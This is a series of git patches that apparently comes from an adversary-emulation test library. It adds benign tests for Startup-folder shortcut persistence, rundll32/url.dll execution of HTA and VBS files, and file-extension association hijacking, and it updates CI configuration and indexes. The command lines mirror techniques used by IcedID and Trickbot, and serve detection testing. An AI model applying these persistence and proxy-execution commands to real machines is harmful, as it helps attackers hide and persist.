Folder,2cb98256-625e-4da9-9d44-f2e5f90b8bd5,powershell persistence,T1547.001,Registry Run Keys / Startup Folder,5,Suspicious jse file run from startup Folder,dade9447-791e-4c8f-b04b-3a35855dfa06,powershell persistence,T1547.001,Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell +persistence,T1547.001,Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash persistence,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt persistence,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 18fe1726..a258b039 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -106,6 +106,7 @@ privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,3,PowerShell R privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,4,Suspicious vbs file run from startup Folder,2cb98256-625e-4da9-9d44-f2e5f90b8bd5,powershell privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,5,Suspicious jse file run from startup Folder,dade9447-791e-4c8f-b04b-3a35855dfa06,powershell privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell +privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell privilege-escalation,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt privilege-escalation,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt privilege-escalation,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt @@ -352,6 +353,7 @@ persistence,T1547.001,Registry Run Keys / Startup Folder,3,PowerShell Registry R persistence,T1547.001,Registry Run Keys / Startup Folder,4,Suspicious vbs file run from startup Folder,2cb98256-625e-4da9-9d44-f2e5f90b8bd5,powershell persistence,T1547.001,Registry Run Keys / Startup Folder,5,Suspicious jse file run from startup Folder,dade9447-791e-4c8f-b04b-3a35855dfa06,powershell persistence,T1547.001,Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell +persistence,T1547.001,Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell persistence,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt persistence,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt persistence,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 078628b9..8b17ab9e 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -130,6 +130,7 @@ - Atomic Test #4: Suspicious vbs file run from startup Folder [windows] - Atomic Test #5: Suspicious jse file run from startup Folder [windows] - Atomic Test #6: Suspicious bat file run from startup Folder [windows] + - Atomic Test #7: Add Executable Shortcut Link to User Startup Folder [windows] - T1134.005 SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md) - Atomic Test #1: Scheduled Task Startup Script [windows] @@ -325,6 +326,7 @@ - Atomic Test #4: Suspicious vbs file run from startup Folder [windows] - Atomic Test #5: Suspicious jse file run from startup Folder [windows] - Atomic Test #6: Suspicious bat file run from startup Folder [windows] + - Atomic Test #7: Add Executable Shortcut Link to User Startup Folder [windows] - T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md) - Atomic Test #1: Modify SSH Authorized Keys [macos, linux] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 75a6f459..430da643 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -229,6 +229,7 @@ - Atomic Test #4: Suspicious vbs file run from startup Folder [windows] - Atomic Test #5: Suspicious jse file run from startup Folder [windows] - Atomic Test #6: Suspicious bat file run from startup Folder [windows] + - Atomic Test #7: Add Executable Shortcut Link to User Startup Folder [windows] - T1134.005 SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md) - Atomic Test #1: Scheduled Task Startup Script [windows] @@ -665,6 +666,7 @@ - Atomic Test #4: Suspicious vbs file run from startup Folder [windows] - Atomic Test #5: Suspicious jse file run from startup Folder [windows] - Atomic Test #6: Suspicious bat file run from startup Folder [windows] + - Atomic Test #7: Add Executable Shortcut Link to User Startup Folder [windows] - T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md) - Atomic Test #1: Scheduled Task Startup Script [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index ab294853..4b927955 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -6429,6 +6429,22 @@ privilege-escalation: Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat" -ErrorAction Ignore name: powershell elevation_required: true + - name: Add Executable Shortcut Link to User Startup Folder + auto_generated_guid: 24e55612-85f6-4bd6-ae74-a73d02e3441d + description: 'Adds a non-malicious executable shortcut link to the current users + startup directory. Test can be verified by going to the users startup directory + and checking if the shortcut link exists. ' + supported_platforms: + - windows + executor: + command: "$Target = \"C:\\Windows\\System32\\calc.exe\"\n$ShortcutLocation + = \"$home\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\calc_exe.lnk\"\n$WScriptShell + = New-Object -ComObject WScript.Shell\n$Create = $WScriptShell.CreateShortcut($ShortcutLocation)\n$Create.TargetPath + = $Target\n$Create.Save() " + cleanup_command: Remove-Item "$home\AppData\Roaming\Microsoft\Windows\Start + Menu\Programs\Startup\calc_exe.lnk" -ErrorAction Ignore + name: powershell + elevation_required: true T1134.005: technique: external_references: @@ -15381,6 +15397,22 @@ persistence: Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat" -ErrorAction Ignore name: powershell elevation_required: true + - name: Add Executable Shortcut Link to User Startup Folder + auto_generated_guid: 24e55612-85f6-4bd6-ae74-a73d02e3441d + description: 'Adds a non-malicious executable shortcut link to the current users + startup directory. Test can be verified by going to the users startup directory + and checking if the shortcut link exists. ' + supported_platforms: + - windows + executor: + command: "$Target = \"C:\\Windows\\System32\\calc.exe\"\n$ShortcutLocation + = \"$home\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\calc_exe.lnk\"\n$WScriptShell + = New-Object -ComObject WScript.Shell\n$Create = $WScriptShell.CreateShortcut($ShortcutLocation)\n$Create.TargetPath + = $Target\n$Create.Save() " + cleanup_command: Remove-Item "$home\AppData\Roaming\Microsoft\Windows\Start + Menu\Programs\Startup\calc_exe.lnk" -ErrorAction Ignore + name: powershell + elevation_required: true T1505.001: technique: external_references: diff --git a/atomics/T1547.001/T1547.001.md b/atomics/T1547.001/T1547.001.md index 09ec8aed..14d14cdd 100644 --- a/atomics/T1547.001/T1547.001.md +++ b/atomics/T1547.001/T1547.001.md @@ -54,6 +54,8 @@ Adversaries can use these configuration locations to execute malware, such as re - [Atomic Test #6 - Suspicious bat file run from startup Folder](#atomic-test-6---suspicious-bat-file-run-from-startup-folder) +- [Atomic Test #7 - Add Executable Shortcut Link to User Startup Folder](#atomic-test-7---add-executable-shortcut-link-to-user-startup-folder) +
@@ -263,4 +265,37 @@ Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batsta +
+
+ +## Atomic Test #7 - Add Executable Shortcut Link to User Startup Folder +Adds a non-malicious executable shortcut link to the current users startup directory. Test can be verified by going to the users startup directory and checking if the shortcut link exists. + +**Supported Platforms:** Windows + + + + + +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) + + +```powershell +$Target = "C:\Windows\System32\calc.exe" +$ShortcutLocation = "$home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\calc_exe.lnk" +$WScriptShell = New-Object -ComObject WScript.Shell +$Create = $WScriptShell.CreateShortcut($ShortcutLocation) +$Create.TargetPath = $Target +$Create.Save() +``` + +#### Cleanup Commands: +```powershell +Remove-Item "$home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\calc_exe.lnk" -ErrorAction Ignore +``` + + + + +
diff --git a/atomics/T1547.001/T1547.001.yaml b/atomics/T1547.001/T1547.001.yaml index f2808208..7cd1d535 100644 --- a/atomics/T1547.001/T1547.001.yaml +++ b/atomics/T1547.001/T1547.001.yaml @@ -124,6 +124,7 @@ atomic_tests: elevation_required: true - name: Add Executable Shortcut Link to User Startup Folder + auto_generated_guid: 24e55612-85f6-4bd6-ae74-a73d02e3441d description: 'Adds a non-malicious executable shortcut link to the current users startup directory. Test can be verified by going to the users startup directory and checking if the shortcut link exists. ' supported_platforms: - windows diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 61e3d7c3..9f759d2d 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -639,3 +639,4 @@ ecd3fa21-7792-41a2-8726-2c5c673414d3 a524ce99-86de-4db6-b4f9-e08f35a47a15 69bd4abe-8759-49a6-8d21-0f15822d6370 6afe288a-8a8b-4d33-a629-8d03ba9dad3a +24e55612-85f6-4bd6-ae74-a73d02e3441d diff --git a/docs/maintainers.md b/docs/maintainers.md index 56ed282e..cd71135d 100644 --- a/docs/maintainers.md +++ b/docs/maintainers.md @@ -12,7 +12,7 @@ Milestones should be used to track all major features or changes, most of which Any breaking change or major feature should be communicated to the community via Slack, using the following process: -1. Announce the issue or milestone in #general (TODO: Should we create #announcements for this purpose?) +1. Announce the issue or milestone in #general 2. Follow up on the original announcement with a link to any public branch that can be reviewed for comment. 3. Once comments and questions have been resolved, announce that the issue will be merged on $date. * For major features, a day's notice is sufficient. From b3e7ae893f328e2d2a8ffed60750243e5f1e7cd9 Mon Sep 17 00:00:00 2001 From: Brian Beyer Date: Fri, 18 Dec 2020 14:19:58 -0700 Subject: [PATCH 017/131] Move CI generation of GUIDs and docs to master branch only (#1337) --- .circleci/config.yml | 87 +++++++++++++++++++------------------------- 1 file changed, 37 insertions(+), 50 deletions(-) diff --git a/.circleci/config.yml b/.circleci/config.yml index 92760ef1..fe4f8014 100644 --- a/.circleci/config.yml +++ b/.circleci/config.yml @@ -6,51 +6,18 @@ defaults: &defaults workflows: version: 2 - validate-then-generate-docs: + validate: jobs: - - generate_and_commit_guids - - validate_atomics: - requires: - - generate_and_commit_guids - - generate_and_commit_docs: - requires: - - generate_and_commit_guids + - validate_atomics + + generate-guids-and-docs: + jobs: + - generate_and_commit_guids_and_docs: + filters: + branches: + only: master jobs: - generate_and_commit_guids: - <<: *defaults - steps: - - checkout - - add_ssh_keys - - - run: - name: Generate unique GUIDs for each atomic test - command: | - bin/generate-guids.rb - - echo "" - echo "" - git status - echo "" - echo "" - git diff-index HEAD -- - - if git diff-index --quiet HEAD -- ; then - echo "Not committing GUID changes because there are no changes" - #elif [[ "${CIRCLE_BRANCH}" == "master" ]]; then - # echo "Not committing GUID changes because we are on master and GUID changes should be part of pull request branches" - elif [[ $(echo "$CIRCLE_BRANCH" | grep -c "pull") -gt 0 ]]; then - echo "Not committing GUID changes because we are on a pull request branch that we don't have push permissions to" - else - git config credential.helper 'cache --timeout=120' - git config user.email "" - git config user.name "CircleCI Atomic Red Team GUID generator" - - git add atomics - git commit -am "Generate GUIDs from job=$CIRCLE_JOB branch=$CIRCLE_BRANCH" - git push -u origin $CIRCLE_BRANCH - fi - validate_atomics: <<: *defaults steps: @@ -61,15 +28,39 @@ jobs: name: Validate the format of atomic tests against the spec command: | bin/validate-atomics.rb - - generate_and_commit_docs: + + generate_and_commit_guids_and_docs: <<: *defaults steps: - checkout - add_ssh_keys - run: - name: Generate nice markdown document for atomics + name: Generate and commit unique GUIDs for each atomic test + command: | + bin/generate-guids.rb + + echo "" + echo "" + git status + echo "" + echo "" + git diff-index HEAD -- + + if git diff-index --quiet HEAD -- ; then + echo "Not committing GUID changes because there are no changes" + else + git config credential.helper 'cache --timeout=120' + git config user.email "" + git config user.name "CircleCI Atomic Red Team GUID generator" + + git add atomics + git commit -am "Generate GUIDs from job=$CIRCLE_JOB branch=$CIRCLE_BRANCH [skip ci]" + git push -u origin $CIRCLE_BRANCH + fi + + - run: + name: Generate and commit nice markdown documents for atomics command: | bin/generate-atomic-docs.rb @@ -82,16 +73,12 @@ jobs: if git diff-index --quiet HEAD -- ; then echo "Not committing documentation because there are no changes" - #elif [[ "${CIRCLE_BRANCH}" == "master" ]]; then - # echo "Not committing documentation because we are on master and doc changes should be part of pull request branches" - elif [[ $(echo "$CIRCLE_BRANCH" | grep -c "pull") -gt 0 ]]; then - echo "Not committing documentation because we are on a pull request branch that we don't have push permissions to" else git config credential.helper 'cache --timeout=120' git config user.email "" git config user.name "CircleCI Atomic Red Team doc generator" git add atomics - git commit -am "Generate docs from job=$CIRCLE_JOB branch=$CIRCLE_BRANCH" + git commit -am "Generate docs from job=$CIRCLE_JOB branch=$CIRCLE_BRANCH [skip ci]" git push -u origin $CIRCLE_BRANCH fi From e059e698ba7cfc72739f41f8a56a7b0b2ec9ffc4 Mon Sep 17 00:00:00 2001 From: clr2of8 Date: Sat, 19 Dec 2020 16:17:38 -0700 Subject: [PATCH 018/131] rundll32 spawning mshta and wscript --- atomics/T1218.011/T1218.011.yaml | 16 ++++++++++++++++ atomics/T1218.011/src/akteullen.vbs | 1 + atomics/T1218.011/src/index.hta | 12 ++++++++++++ 3 files changed, 29 insertions(+) create mode 100644 atomics/T1218.011/src/akteullen.vbs create mode 100644 atomics/T1218.011/src/index.hta diff --git a/atomics/T1218.011/T1218.011.yaml b/atomics/T1218.011/T1218.011.yaml index dabd185b..1b8412ac 100644 --- a/atomics/T1218.011/T1218.011.yaml +++ b/atomics/T1218.011/T1218.011.yaml @@ -112,6 +112,7 @@ atomic_tests: command: | rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 .\#{inf_to_execute} name: command_prompt + - name: Rundll32 setupapi.dll Execution auto_generated_guid: 71d771cd-d6b3-4f34-bc76-a63d47a10b19 description: | @@ -139,3 +140,18 @@ atomic_tests: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 .\#{inf_to_execute} name: command_prompt +- name: Execution of HTA and VBS Files using Rundll32 and URL.dll + description: | + IcedID uses this TTP as follows: + rundll32.exe url.dll,OpenURL %PUBLIC%\index.hta + Trickbot uses this TTP as follows: + rundll32.exe URL.dll,FileProtocolHandler C:\\..\\Detail\\akteullen.vbs + + In this atomic, the sample hta file opens the calculator and the vbs file show a message dialog with "rundll32 spawned wscript" + supported_platforms: + - windows + executor: + command: | + rundll32.exe url.dll,OpenURL PathToAtomicsFolder\T1218.011\src\index.hta + rundll32.exe URL.dll,FileProtocolHandler PathToAtomicsFolder\T1218.011\src\akteullen.vbs + name: command_prompt \ No newline at end of file diff --git a/atomics/T1218.011/src/akteullen.vbs b/atomics/T1218.011/src/akteullen.vbs new file mode 100644 index 00000000..de5f1b91 --- /dev/null +++ b/atomics/T1218.011/src/akteullen.vbs @@ -0,0 +1 @@ +WScript.Echo "rundll32 spawned wscript" \ No newline at end of file diff --git a/atomics/T1218.011/src/index.hta b/atomics/T1218.011/src/index.hta new file mode 100644 index 00000000..59101b61 --- /dev/null +++ b/atomics/T1218.011/src/index.hta @@ -0,0 +1,12 @@ + + + + + + + + + \ No newline at end of file From fd2bbab66b7e101dac102f58f91d4d2be005d13b Mon Sep 17 00:00:00 2001 From: clr2of8 Date: Sat, 19 Dec 2020 16:26:33 -0700 Subject: [PATCH 019/131] typo fix --- atomics/T1218.011/T1218.011.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1218.011/T1218.011.yaml b/atomics/T1218.011/T1218.011.yaml index 1b8412ac..2b917385 100644 --- a/atomics/T1218.011/T1218.011.yaml +++ b/atomics/T1218.011/T1218.011.yaml @@ -147,7 +147,7 @@ atomic_tests: Trickbot uses this TTP as follows: rundll32.exe URL.dll,FileProtocolHandler C:\\..\\Detail\\akteullen.vbs - In this atomic, the sample hta file opens the calculator and the vbs file show a message dialog with "rundll32 spawned wscript" + In this atomic, the sample hta file opens the calculator and the vbs file shows a message dialog with "rundll32 spawned wscript" supported_platforms: - windows executor: From dbaaec10215031419521ff23cb1e1c2669339a47 Mon Sep 17 00:00:00 2001 From: andrewyaj <62386837+andrewyaj@users.noreply.github.com> Date: Mon, 21 Dec 2020 10:13:37 -0600 Subject: [PATCH 020/131] T1546.001 update (#1339) * notes for updating cleanup command * T1546.001-cleanup Co-authored-by: Andrew Yang --- atomics/T1546.001/T1546.001.yaml | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/atomics/T1546.001/T1546.001.yaml b/atomics/T1546.001/T1546.001.yaml index 235eff3d..e1e51bd8 100644 --- a/atomics/T1546.001/T1546.001.yaml +++ b/atomics/T1546.001/T1546.001.yaml @@ -18,10 +18,16 @@ atomic_tests: description: File Extension To Hijack type: String default: .hta + #Adding additional input arguement below for new cleanup command + original_extension_handler: + description: File Extension To Revert + type: String + default: htafile executor: command: | assoc #{extension_to_change}=#{target_extension_handler} cleanup_command: | - assoc .hta=htafile >nul 2>&1 + assoc #{extension_to_change}=#{original_extension_handler} + name: command_prompt - + elevation_required: true \ No newline at end of file From 0fe0dc26c6a38b0c0c56d0e89b5e8261e7b25b44 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Mon, 21 Dec 2020 16:14:07 +0000 Subject: [PATCH 021/131] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 14 ++++++++++++-- atomics/T1546.001/T1546.001.md | 5 +++-- 2 files changed, 15 insertions(+), 4 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 4b927955..56fdf168 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -1809,14 +1809,19 @@ privilege-escalation: description: File Extension To Hijack type: String default: ".hta" + original_extension_handler: + description: File Extension To Revert + type: String + default: htafile executor: command: 'assoc #{extension_to_change}=#{target_extension_handler} ' - cleanup_command: 'assoc .hta=htafile >nul 2>&1 + cleanup_command: 'assoc #{extension_to_change}=#{original_extension_handler} ' name: command_prompt + elevation_required: true T1078.004: technique: id: attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65 @@ -10755,14 +10760,19 @@ persistence: description: File Extension To Hijack type: String default: ".hta" + original_extension_handler: + description: File Extension To Revert + type: String + default: htafile executor: command: 'assoc #{extension_to_change}=#{target_extension_handler} ' - cleanup_command: 'assoc .hta=htafile >nul 2>&1 + cleanup_command: 'assoc #{extension_to_change}=#{original_extension_handler} ' name: command_prompt + elevation_required: true T1136.003: technique: external_references: diff --git a/atomics/T1546.001/T1546.001.md b/atomics/T1546.001/T1546.001.md index 72cbb2da..14d91955 100644 --- a/atomics/T1546.001/T1546.001.md +++ b/atomics/T1546.001/T1546.001.md @@ -31,9 +31,10 @@ Upon successful execution, cmd.exe will change the file association of .hta to n |------|-------------|------|---------------| | target_extension_handler | txtfile maps to notepad.exe | Path | txtfile| | extension_to_change | File Extension To Hijack | String | .hta| +| original_extension_handler | File Extension To Revert | String | htafile| -#### Attack Commands: Run with `command_prompt`! +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd @@ -42,7 +43,7 @@ assoc #{extension_to_change}=#{target_extension_handler} #### Cleanup Commands: ```cmd -assoc .hta=htafile >nul 2>&1 +assoc #{extension_to_change}=#{original_extension_handler} ``` From 9be279e20f451dcad46f2e1a4d44d485669d8543 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Mon, 21 Dec 2020 16:40:06 +0000 Subject: [PATCH 022/131] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1218.011/T1218.011.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1218.011/T1218.011.yaml b/atomics/T1218.011/T1218.011.yaml index 2b917385..9ecbd145 100644 --- a/atomics/T1218.011/T1218.011.yaml +++ b/atomics/T1218.011/T1218.011.yaml @@ -141,6 +141,7 @@ atomic_tests: name: command_prompt - name: Execution of HTA and VBS Files using Rundll32 and URL.dll + auto_generated_guid: 22cfde89-befe-4e15-9753-47306b37a6e3 description: | IcedID uses this TTP as follows: rundll32.exe url.dll,OpenURL %PUBLIC%\index.hta diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 9f759d2d..24b5a578 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -640,3 +640,4 @@ a524ce99-86de-4db6-b4f9-e08f35a47a15 69bd4abe-8759-49a6-8d21-0f15822d6370 6afe288a-8a8b-4d33-a629-8d03ba9dad3a 24e55612-85f6-4bd6-ae74-a73d02e3441d +22cfde89-befe-4e15-9753-47306b37a6e3 From aa8e484d30b1fc0ef6cc84240e1bac23ee52adff Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Mon, 21 Dec 2020 16:40:14 +0000 Subject: [PATCH 023/131] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 16 ++++++++++ atomics/T1218.011/T1218.011.md | 32 +++++++++++++++++++ 6 files changed, 52 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index eb43aae9..5379c2b3 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -479,6 +479,7 @@ defense-evasion,T1218.011,Rundll32,3,Rundll32 advpack.dll Execution,d91cae26-7fc defense-evasion,T1218.011,Rundll32,4,Rundll32 ieadvpack.dll Execution,5e46a58e-cbf6-45ef-a289-ed7754603df9,command_prompt defense-evasion,T1218.011,Rundll32,5,Rundll32 syssetup.dll Execution,41fa324a-3946-401e-bbdd-d7991c628125,command_prompt defense-evasion,T1218.011,Rundll32,6,Rundll32 setupapi.dll Execution,71d771cd-d6b3-4f34-bc76-a63d47a10b19,command_prompt +defense-evasion,T1218.011,Rundll32,7,Execution of HTA and VBS Files using Rundll32 and URL.dll,22cfde89-befe-4e15-9753-47306b37a6e3,command_prompt defense-evasion,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell defense-evasion,T1574.011,Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt defense-evasion,T1548.001,Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index a258b039..e7b06daa 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -282,6 +282,7 @@ defense-evasion,T1218.011,Rundll32,3,Rundll32 advpack.dll Execution,d91cae26-7fc defense-evasion,T1218.011,Rundll32,4,Rundll32 ieadvpack.dll Execution,5e46a58e-cbf6-45ef-a289-ed7754603df9,command_prompt defense-evasion,T1218.011,Rundll32,5,Rundll32 syssetup.dll Execution,41fa324a-3946-401e-bbdd-d7991c628125,command_prompt defense-evasion,T1218.011,Rundll32,6,Rundll32 setupapi.dll Execution,71d771cd-d6b3-4f34-bc76-a63d47a10b19,command_prompt +defense-evasion,T1218.011,Rundll32,7,Execution of HTA and VBS Files using Rundll32 and URL.dll,22cfde89-befe-4e15-9753-47306b37a6e3,command_prompt defense-evasion,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell defense-evasion,T1574.011,Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt defense-evasion,T1218,Signed Binary Proxy Execution,1,mavinject - Inject DLL into running process,c426dacf-575d-4937-8611-a148a86a5e61,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 8b17ab9e..b64b5c88 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -878,6 +878,7 @@ - Atomic Test #4: Rundll32 ieadvpack.dll Execution [windows] - Atomic Test #5: Rundll32 syssetup.dll Execution [windows] - Atomic Test #6: Rundll32 setupapi.dll Execution [windows] + - Atomic Test #7: Execution of HTA and VBS Files using Rundll32 and URL.dll [windows] - T1134.005 SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1553.003 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1064 Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 430da643..4a6d592b 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -510,6 +510,7 @@ - Atomic Test #4: Rundll32 ieadvpack.dll Execution [windows] - Atomic Test #5: Rundll32 syssetup.dll Execution [windows] - Atomic Test #6: Rundll32 setupapi.dll Execution [windows] + - Atomic Test #7: Execution of HTA and VBS Files using Rundll32 and URL.dll [windows] - T1134.005 SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1553.003 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1064 Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 56fdf168..ca086f79 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -38247,6 +38247,22 @@ defense-evasion: ' name: command_prompt + - name: Execution of HTA and VBS Files using Rundll32 and URL.dll + auto_generated_guid: 22cfde89-befe-4e15-9753-47306b37a6e3 + description: | + IcedID uses this TTP as follows: + rundll32.exe url.dll,OpenURL %PUBLIC%\index.hta + Trickbot uses this TTP as follows: + rundll32.exe URL.dll,FileProtocolHandler C:\\..\\Detail\\akteullen.vbs + + In this atomic, the sample hta file opens the calculator and the vbs file shows a message dialog with "rundll32 spawned wscript" + supported_platforms: + - windows + executor: + command: | + rundll32.exe url.dll,OpenURL PathToAtomicsFolder\T1218.011\src\index.hta + rundll32.exe URL.dll,FileProtocolHandler PathToAtomicsFolder\T1218.011\src\akteullen.vbs + name: command_prompt T1134.005: technique: external_references: diff --git a/atomics/T1218.011/T1218.011.md b/atomics/T1218.011/T1218.011.md index 3c04be73..46eace6c 100644 --- a/atomics/T1218.011/T1218.011.md +++ b/atomics/T1218.011/T1218.011.md @@ -20,6 +20,8 @@ Rundll32 can also be used to execute scripts such as JavaScript. This can be don - [Atomic Test #6 - Rundll32 setupapi.dll Execution](#atomic-test-6---rundll32-setupapidll-execution) +- [Atomic Test #7 - Execution of HTA and VBS Files using Rundll32 and URL.dll](#atomic-test-7---execution-of-hta-and-vbs-files-using-rundll32-and-urldll) +
@@ -257,4 +259,34 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato +
+
+ +## Atomic Test #7 - Execution of HTA and VBS Files using Rundll32 and URL.dll +IcedID uses this TTP as follows: + rundll32.exe url.dll,OpenURL %PUBLIC%\index.hta +Trickbot uses this TTP as follows: + rundll32.exe URL.dll,FileProtocolHandler C:\\..\\Detail\\akteullen.vbs + +In this atomic, the sample hta file opens the calculator and the vbs file shows a message dialog with "rundll32 spawned wscript" + +**Supported Platforms:** Windows + + + + + +#### Attack Commands: Run with `command_prompt`! + + +```cmd +rundll32.exe url.dll,OpenURL PathToAtomicsFolder\T1218.011\src\index.hta +rundll32.exe URL.dll,FileProtocolHandler PathToAtomicsFolder\T1218.011\src\akteullen.vbs +``` + + + + + +
